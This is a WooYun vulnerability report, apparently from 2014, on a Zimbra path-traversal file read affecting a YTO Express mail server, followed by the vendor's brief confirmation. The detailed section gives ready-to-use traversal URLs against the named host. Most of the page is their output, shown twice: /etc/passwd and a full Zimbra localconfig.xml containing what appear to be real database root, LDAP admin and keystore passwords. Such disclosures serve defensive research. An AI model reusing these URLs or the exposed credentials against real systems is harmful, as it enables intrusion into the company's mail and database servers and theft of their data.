当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-084804

漏洞标题:圆通某业务线某邮件服务器任意文件读取

相关厂商:圆通

漏洞作者: Summer

提交时间:2014-11-26 15:47

修复时间:2015-01-10 15:48

公开时间:2015-01-10 15:48

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-26: 细节已通知厂商并且等待厂商处理中
2014-11-27: 厂商已经确认,细节仅向厂商公开
2014-12-07: 细节向核心白帽子及相关领域专家公开
2014-12-17: 细节向普通白帽子公开
2014-12-27: 细节向实习白帽子公开
2015-01-10: 细节向公众公开

简要描述:

读不懂塞北的荒野

详细说明:

http://mail.yto56.com.cn/
Zimbra邮件系统文件包含漏洞(http://sebug.net/vuldb/ssvid-61096)

http://mail.yto56.com.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00


/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00


w3.png


w1.png


w2.png

漏洞证明:

a.root="x:0:0:root:/root:/bin/bash";
a.bin="x:1:1:bin:/bin:/sbin/nologin";
a.daemon="x:2:2:daemon:/sbin:/sbin/nologin";
a.adm="x:3:4:adm:/var/adm:/sbin/nologin";
a.lp="x:4:7:lp:/var/spool/lpd:/sbin/nologin";
a.sync="x:5:0:sync:/sbin:/bin/sync";
a.shutdown="x:6:0:shutdown:/sbin:/sbin/shutdown";
a.halt="x:7:0:halt:/sbin:/sbin/halt";
a.mail="x:8:12:mail:/var/spool/mail:/sbin/nologin";
a.uucp="x:10:14:uucp:/var/spool/uucp:/sbin/nologin";
a.operator="x:11:0:operator:/root:/sbin/nologin";
a.games="x:12:100:games:/usr/games:/sbin/nologin";
a.gopher="x:13:30:gopher:/var/gopher:/sbin/nologin";
a.ftp="x:14:50:FTP User:/var/ftp:/sbin/nologin";
a.nobody="x:99:99:Nobody:/:/sbin/nologin";
a.dbus="x:81:81:System message bus:/:/sbin/nologin";
a.vcsa="x:69:69:virtual console memory owner:/dev:/sbin/nologin";
a.rpc="x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin";
a.abrt="x:173:173::/etc/abrt:/sbin/nologin";
a.saslauth="x:499:76:\"Saslauthd user\":/var/empty/saslauth:/sbin/nologin";
a.postfix="x:89:89::/var/spool/postfix:/sbin/nologin";
a.qpidd="x:498:499:Owner of Qpidd Daemons:/var/lib/qpidd:/sbin/nologin";
a.haldaemon="x:68:68:HAL daemon:/:/sbin/nologin";
a.ntp="x:38:38::/etc/ntp:/sbin/nologin";
a.rpcuser="x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin";
a.nfsnobody="x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin";
a.sshd="x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin";
a.tcpdump="x:72:72::/:/sbin/nologin";
a.oprofile="x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin";
a.zimbra="x:500:500::/opt/zimbra:/bin/bash";


a["<?xml"]="version=\"1.0\" encoding=\"UTF-8\"?>";
a["<localconfig>"]="";
a["<key"]="name=\"ldap_postfix_password\">";
a["<value></value>"]="";
a["</key>"]="";
a["<key"]="name=\"ldap_master_url\">";
a["<value>ldap"]="//zmldap1.yto56.com.cn:389</value>";
a["</key>"]="";
a["<key"]="name=\"mailboxd_keystore\">";
a["<value>/opt/zimbra/mailboxd/etc/keystore</value>"]="";
a["</key>"]="";
a["<key"]="name=\"ldap_amavis_password\">";
a["<value></value>"]="";
a["</key>"]="";
a["<key"]="name=\"zimbra_java_home\">";
a["<value>/opt/zimbra/java</value>"]="";
a["</key>"]="";
a["<key"]="name=\"smtp_source\">";
a["<value>[email protected]</value>"]="";
a["</key>"]="";
a["<key"]="name=\"zimbra_gid\">";
a["<value>500</value>"]="";
a["</key>"]="";
a["<key"]="name=\"av_notify_domain\">";
a["<value>zmmailbox.yto56.com.cn</value>"]="";
a["</key>"]="";
a["<key"]="name=\"smtp_destination\">";
a["<value>[email protected]</value>"]="";
a["</key>"]="";
a["<key"]="name=\"mailboxd_java_heap_size\">";
a["<value>1971</value>"]="";
a["</key>"]="";
a["<key"]="name=\"ldap_url\">";
a["<value>ldap"]="//zmldap2.yto56.com.cn:389 ldap://zmldap1.yto56.com.cn:389</value>";
a["</key>"]="";
a["<key"]="name=\"ldap_replication_password\">";
a["<value></value>"]="";
a["</key>"]="";
a["<key"]="name=\"ldap_starttls_supported\">";
a["<value>1</value>"]="";
a["</key>"]="";
a["<key"]="name=\"mailboxd_directory\">";
a["<value>/opt/zimbra/mailboxd</value>"]="";
a["</key>"]="";
a["<key"]="name=\"ldap_root_password\">";
a["<value></value>"]="";
a["</key>"]="";
a["<key"]="name=\"av_notify_user\">";
a["<value>[email protected]</value>"]="";
a["</key>"]="";
a["<key"]="name=\"mailboxd_server\">";
a["<value>jetty</value>"]="";
a["</key>"]="";
a["<key"]="name=\"zimbra_ldap_userdn\">";
a["<value>uid"]="zimbra,cn=admins,cn=zimbra</value>";
a["</key>"]="";
a["<key"]="name=\"zimbra_mysql_connector_maxActive\">";
a["<value>100</value>"]="";
a["</key>"]="";
a["<key"]="name=\"smtp_notify\">";
a["<value>yes</value>"]="";
a["</key>"]="";
a["<key"]="name=\"ldap_bes_searcher_password\">";
a["<value></value>"]="";
a["</key>"]="";
a["<key"]="name=\"ldap_nginx_password\">";
a["<value></value>"]="";
a["</key>"]="";
a["<key"]="name=\"zimbra_zmprov_default_to_ldap\">";
a["<value>false</value>"]="";
a["</key>"]="";
a["<key"]="name=\"zimbra_require_interprocess_security\">";
a["<value>1</value>"]="";
a["</key>"]="";
a["<key"]="name=\"zimbra_uid\">";
a["<value>500</value>"]="";
a["</key>"]="";
a["<key"]="name=\"mailboxd_keystore_password\">";
a["<value>Vozt0XPb</value>"]="";
a["</key>"]="";
a["<key"]="name=\"ldap_host\">";
a["<value>zmldap1.yto56.com.cn</value>"]="";
a["</key>"]="";
a["<key"]="name=\"mailboxd_truststore\">";
a["<value>/opt/zimbra/java/jre/lib/security/cacerts</value>"]="";
a["</key>"]="";
a["<key"]="name=\"zimbra_mysql_password\">";
a["<value>VsxpwpZX9xP1BMUf0pySt.kb</value>"]="";
a["</key>"]="";
a["<key"]="name=\"zimbra_zmjava_options\">";
a["<value>-Xmx256m"]="-Djava.net.preferIPv4Stack=true</value>";
a["</key>"]="";
a["<key"]="name=\"zimbra_ldap_password\">";
a["<value>ldapadmin</value>"]="";
a["</key>"]="";
a["<key"]="name=\"ldap_port\">";
a["<value>389</value>"]="";
a["</key>"]="";
a["<key"]="name=\"mailboxd_java_options\">";
a["<value>-server"]="-Djava.awt.headless=true -Dsun.net.inetaddr.ttl=60 -XX:+UseConcMarkSweepGC -XX:PermSize=128m -XX:MaxPermSize=350m -XX:SoftRefLRUPolicyMSPerMB=1 -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCTimeStamps -XX:+PrintGCApplicationStoppedTime -XX:-OmitStackTraceInFastThrow -Djava.net.preferIPv4Stack=true</value>";
a["</key>"]="";
a["<key"]="name=\"snmp_notify\">";
a["<value>yes</value>"]="";
a["</key>"]="";
a["<key"]="name=\"ssl_allow_mismatched_certs\">";
a["<value>true</value>"]="";
a["</key>"]="";
a["<key"]="name=\"snmp_trap_host\">";
a["<value>zmmailbox.yto56.com.cn</value>"]="";
a["</key>"]="";
a["<key"]="name=\"mysql_root_password\">";
a["<value>NvVh64.JxGyPrZtQDI58xIl7Grq4</value>"]="";
a["</key>"]="";
a["<key"]="name=\"zimbra_user\">";
a["<value>zimbra</value>"]="";
a["</key>"]="";
a["<key"]="name=\"mailboxd_truststore_password\">";
a["<value>changeit</value>"]="";
a["</key>"]="";
a["<key"]="name=\"zimbra_server_hostname\">";
a["<value>zmmailbox.yto56.com.cn</value>"]="";
a["</key>"]="";
a["<key"]="name=\"ssl_allow_untrusted_certs\">";
a["<value>false</value>"]="";
a["</key>"]="";
a["</localconfig>"]="";
if (!window.I18nMsg) { I18nMsg = {}; }
a=I18nMsg;
a["<?xml"]="version=\"1.0\" encoding=\"UTF-8\"?>";
a["<localconfig>"]="";
a["<key"]="name=\"ldap_postfix_password\">";
a["<value></value>"]="";
a["</key>"]="";
a["<key"]="name=\"ldap_master_url\">";
a["<value>ldap"]="//zmldap1.yto56.com.cn:389</value>";
a["</key>"]="";
a["<key"]="name=\"mailboxd_keystore\">";
a["<value>/opt/zimbra/mailboxd/etc/keystore</value>"]="";
a["</key>"]="";
a["<key"]="name=\"ldap_amavis_password\">";
a["<value></value>"]="";
a["</key>"]="";
a["<key"]="name=\"zimbra_java_home\">";
a["<value>/opt/zimbra/java</value>"]="";
a["</key>"]="";
a["<key"]="name=\"smtp_source\">";
a["<value>[email protected]</value>"]="";
a["</key>"]="";
a["<key"]="name=\"zimbra_gid\">";
a["<value>500</value>"]="";
a["</key>"]="";
a["<key"]="name=\"av_notify_domain\">";
a["<value>zmmailbox.yto56.com.cn</value>"]="";
a["</key>"]="";
a["<key"]="name=\"smtp_destination\">";
a["<value>[email protected]</value>"]="";
a["</key>"]="";
a["<key"]="name=\"mailboxd_java_heap_size\">";
a["<value>1971</value>"]="";
a["</key>"]="";
a["<key"]="name=\"ldap_url\">";
a["<value>ldap"]="//zmldap2.yto56.com.cn:389 ldap://zmldap1.yto56.com.cn:389</value>";
a["</key>"]="";
a["<key"]="name=\"ldap_replication_password\">";
a["<value></value>"]="";
a["</key>"]="";
a["<key"]="name=\"ldap_starttls_supported\">";
a["<value>1</value>"]="";
a["</key>"]="";
a["<key"]="name=\"mailboxd_directory\">";
a["<value>/opt/zimbra/mailboxd</value>"]="";
a["</key>"]="";
a["<key"]="name=\"ldap_root_password\">";
a["<value></value>"]="";
a["</key>"]="";
a["<key"]="name=\"av_notify_user\">";
a["<value>[email protected]</value>"]="";
a["</key>"]="";
a["<key"]="name=\"mailboxd_server\">";
a["<value>jetty</value>"]="";
a["</key>"]="";
a["<key"]="name=\"zimbra_ldap_userdn\">";
a["<value>uid"]="zimbra,cn=admins,cn=zimbra</value>";
a["</key>"]="";
a["<key"]="name=\"zimbra_mysql_connector_maxActive\">";
a["<value>100</value>"]="";
a["</key>"]="";
a["<key"]="name=\"smtp_notify\">";
a["<value>yes</value>"]="";
a["</key>"]="";
a["<key"]="name=\"ldap_bes_searcher_password\">";
a["<value></value>"]="";
a["</key>"]="";
a["<key"]="name=\"ldap_nginx_password\">";
a["<value></value>"]="";
a["</key>"]="";
a["<key"]="name=\"zimbra_zmprov_default_to_ldap\">";
a["<value>false</value>"]="";
a["</key>"]="";
a["<key"]="name=\"zimbra_require_interprocess_security\">";
a["<value>1</value>"]="";
a["</key>"]="";
a["<key"]="name=\"zimbra_uid\">";
a["<value>500</value>"]="";
a["</key>"]="";
a["<key"]="name=\"mailboxd_keystore_password\">";
a["<value>Vozt0XPb</value>"]="";
a["</key>"]="";
a["<key"]="name=\"ldap_host\">";
a["<value>zmldap1.yto56.com.cn</value>"]="";
a["</key>"]="";
a["<key"]="name=\"mailboxd_truststore\">";
a["<value>/opt/zimbra/java/jre/lib/security/cacerts</value>"]="";
a["</key>"]="";
a["<key"]="name=\"zimbra_mysql_password\">";
a["<value>VsxpwpZX9xP1BMUf0pySt.kb</value>"]="";
a["</key>"]="";
a["<key"]="name=\"zimbra_zmjava_options\">";
a["<value>-Xmx256m"]="-Djava.net.preferIPv4Stack=true</value>";
a["</key>"]="";
a["<key"]="name=\"zimbra_ldap_password\">";
a["<value>ldapadmin</value>"]="";
a["</key>"]="";
a["<key"]="name=\"ldap_port\">";
a["<value>389</value>"]="";
a["</key>"]="";
a["<key"]="name=\"mailboxd_java_options\">";
a["<value>-server"]="-Djava.awt.headless=true -Dsun.net.inetaddr.ttl=60 -XX:+UseConcMarkSweepGC -XX:PermSize=128m -XX:MaxPermSize=350m -XX:SoftRefLRUPolicyMSPerMB=1 -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCTimeStamps -XX:+PrintGCApplicationStoppedTime -XX:-OmitStackTraceInFastThrow -Djava.net.preferIPv4Stack=true</value>";
a["</key>"]="";
a["<key"]="name=\"snmp_notify\">";
a["<value>yes</value>"]="";
a["</key>"]="";
a["<key"]="name=\"ssl_allow_mismatched_certs\">";
a["<value>true</value>"]="";
a["</key>"]="";
a["<key"]="name=\"snmp_trap_host\">";
a["<value>zmmailbox.yto56.com.cn</value>"]="";
a["</key>"]="";
a["<key"]="name=\"mysql_root_password\">";
a["<value>NvVh64.JxGyPrZtQDI58xIl7Grq4</value>"]="";
a["</key>"]="";
a["<key"]="name=\"zimbra_user\">";
a["<value>zimbra</value>"]="";
a["</key>"]="";
a["<key"]="name=\"mailboxd_truststore_password\">";
a["<value>changeit</value>"]="";
a["</key>"]="";
a["<key"]="name=\"zimbra_server_hostname\">";
a["<value>zmmailbox.yto56.com.cn</value>"]="";
a["</key>"]="";
a["<key"]="name=\"ssl_allow_untrusted_certs\">";
a["<value>false</value>"]="";
a["</key>"]="";
a["</localconfig>"]="";

修复方案:

版权声明:转载请注明来源 Summer@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-11-27 08:57

厂商回复:

已经在处理了,非常感谢!

最新状态:

暂无